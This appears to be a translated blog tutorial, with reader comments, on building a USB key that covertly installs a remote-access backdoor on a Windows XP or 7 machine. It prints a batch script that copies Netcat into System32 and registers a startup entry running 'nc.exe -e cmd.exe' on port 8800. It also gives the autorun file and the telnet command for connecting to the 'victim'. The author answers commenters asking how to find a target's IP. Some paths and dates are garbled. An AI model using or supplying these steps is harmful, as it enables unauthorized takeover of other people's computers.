Take control of a remote PC with a USB key

FunInformatique 10 months ago 4 minutes of reading

how to inject a backdoor with a usb key

Last updated: July 10, 2023

In the previous articles, we have seen how to create a Rootkit USB stick which recovers passwords from a computer under Windows. Today we will see how to create a USB key that opens a backdoor on a machine Windows.

This rootkit runs automatically, creates a backdoor on a pc Windows and allows you to take control remotely.

As usual theobjective this tutorial, is to show business leaders to what extent the use of keys USB can be dangerous. What is valid for companies is no less valid for private individuals.

Take control of a PC remotely

To take control of a PC remotely with a USB key, you must follow the steps above:

Download the Netcat tool

First, we will create a new folder on our USB drive. Then we will download Netcat, a utility for opening network connections, whether UDP or TCP.

You can also use the Cryptcat tool, the Netcat clone, on the sole condition that the latter encrypts its communications.

Download Netcat for windows

After downloading Netcat, we unzip it in the folder created recently.

Create a .bat script

Then we will create a file backdoor.bat. This small file has two objectives:

Copy the Netcat files to the System32 folder of the target computer.
Add a string value in the registry of the victim PC for our backdoor to launch on every boot.

To do this, we will create a new text document with the text editor Notepad or other text editor and paste the code below:

copy *.* "%SYSTEMROOT%/System32"
REG ADD « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “backdoor” /t “REG_SZ” /d “%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800”

Create an autorun file

Now we have to create the file autorun.inf.

In this step, we will create a new option in the window that appears when inserting a USB, which will allow us (once click on it) to install our backdoor on the target computer.

To achieve this, open a new text document then insert this code:

[Autorun]
open = backdoor.bat
ACTION=”give a name to this action”

Finally we save the file under the root of the key under the name autorun.inf

Implement the backdoor created

After inserting the USB key, you can connect to the victim's computer from any machine with the following command:

telnet 192.168.1.17 8800

192.168.1.17 designates the IP address of the remote machine that you need to replace. And 8800 is the port to use to connect.

And There you go ! With this technique you will be able to take control of a PC remotely. You can do whatever you want: open files, launch a search, run a program...

Here is a list of the commands to handle the machine from a distance: Read orders Windows.

To log out, type "logout".

Make good use of it.

Note: this trick does not work under Windows 10 et Windows 11. It only works on Windows 7 and Windows XP.

23 Questions / Answers

Ezra says:

16 May 2022 22 in 36 h min

I don't quite know how to connect
Even if we remove the key are we still connected?
And also at what level does he put the code?
To command prompt or netcap?

Reply
anonymous says:

April 23 2020 to 15 02 h min

hello is there a way to do the same thing but on windows 10?

Reply
rapetou says:

January 17 2020 19 to 04 h min

Hello when I want to connect to netcat or other it asks me for a code and I can't find it

Reply
Unknown says:

December 16 2016 to 0 04 h min

I do not understand. Where to find the port? and where to insert the command telnet … in the cmd?

Reply
Theo Wolfersperger says:

November 1 2016 to 20 17 h min

hello, the autorun.inf folder does not work, I save it as ,
autorun.inf and I put it directly on my usb key, but when inserting
usb key, nothing is displayed. a little help please ??And the command telnet 192.168.1.17 880 , you have to type it in CMD ??

Reply
- anonymous says:
  
  14 May 2017 17 in 36 h min
  
  You're sure windows 10 i guess? BECAUSE ON windows 10 They deleted .inf because it was the door open to all hackers
  
  Reply
GTA-Production says:

14 2016 June to 18 33 h min

the links are dead

Reply
- jean says:
  
  August 29 2017 to 21 13 h min
  
  not.
  
  Reply
Juguet Patrick says:

April 1 2016 to 15 36 h min

Ahmad hello,
Very interesting article, only one problem it does not work, I explain my problem.
I have an old pc xp on which I introduced the backdoor by following your tutorial to the letter.
When I launch telnet under ubuntu this one cannot resolve the ip address of the xp
telnet: could not resolve xxx.xxx.x.xx…8800/telnet: Name or service not
an ipconfig in the xp console confirms to me, however, that it is the right one.
An idea ?
Thank you in advance and have a good evening

Reply
Paul says:

March 16 2015 to 12 28 h min

Shouldn't there be a backslash there?
copy *.* "%SYSTEMROOT%/System32"
copy *.* "%SYSTEMROOT%/System32"
copy *.* "%SYSTEMROOT%/System32"
??
Otherwise all that's missing is configuring it to steal the IP of the target computer 🙂

Reply
lerin says:

February 5 2015 to 13 58 h min

Hello, I am interested in computer security and I would like to know if we create a backdoor in a computer. This poses a problem because we open a port here on 8800, so anyone can connect to it if they send requests and see the port?
Thank you

Reply
novice says:

10 September 2014 14 to 16 h min

Hi all . Excuse me for having full access to this computer remotely, do I need internet?

Reply
- Ahmed says:
  
  26 September 2014 17 to 46 h min
  
  Exactly, you will need an internet connection.
  
  Reply
  - Killian Armand says:
    
    April 29 2015 to 23 04 h min
    
    Hello, when I enter the command in NetCat, the program returns “lookup failed errno 1004 NO_NATA” something like this… Can you help me please?
B3 INV!SIBL3 says:

August 29 2014 to 15 58 h min

Hello. I have a little problem with this backdoor. I followed each step of the procedure, but when I plug my USB key into another computer, no option appears to open NetCat and have access to my own computer. What should I do then? Thank you for your reply !

Reply
- Max1trick says:
  
  January 7 2017 20 to 35 h min
  
  Hello,
  You must install the portable software “putty”.
  In "ip address": the ip address of the target computer
  In "port": 8800
  And in “connection type”: telnet
  
  Reply
Sean Poirier says:

21 May 2014 16 in 47 h min

Does the PC absolutely have to be running to use this?

Reply
amine says:

20 May 2014 21 in 04 h min

Hello, when I put the files to create the backdoor on the USB key, all my documents turned into shortcuts, they are no longer usable. HELP MEEEEEEEEEEEEEEE!!

Reply
Interested says:

April 27 2012 to 22 38 h min

I tried to access my XP machine by following the procedure but it doesn't work... even disabling firewall and antivirus

Reply
- Ahmed says:
  
  2 May 2012 16 in 00 h min
  
  Can you give me the error message that appears when you try to connect with telnet?
  
  Reply
  - Ben Arfa Wy says:
    
    November 20 2012 to 20 35 h min
    
    Me especially I would like to know how to obtain the ip address of the pc which one has to install the backdoor?
  - Ahmed says:
    
    February 10 2013 to 19 02 h min
    
    If you want to get the ip address of a pc in a local network, just open the cmd and type the net view command after you ping the machine name.
    Otherwise if you have the pc in your hands, you can simply type in the command prompt: ipconfig and you will have the IP address
Corentin Coustham says:

March 18 2012 to 18 46 h min

What is the command in ubuntu?

Reply